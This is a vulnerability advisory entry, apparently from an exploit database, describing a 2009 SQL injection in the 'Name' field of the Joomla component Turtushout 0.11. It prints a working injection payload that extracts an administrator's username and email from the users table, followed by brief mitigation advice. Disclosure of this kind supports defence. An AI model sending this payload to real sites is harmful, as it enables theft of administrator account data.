vendor:
Turtushout
by:
jdc
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Turtushout
Affected Version From: 0.11
Affected Version To: 0.11
Patch Exists: YES
Related CWE: N/A
CPE: a:turtushout:turtushout:0.11
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Joomla Component Turtushout 0.11SQL Injection
The vulnerability exists in the 'Name' field of the Joomla Component Turtushout 0.11, which allows an attacker to inject malicious SQL queries. The malicious query used in this exploit is 'test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '
Mitigation:
The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.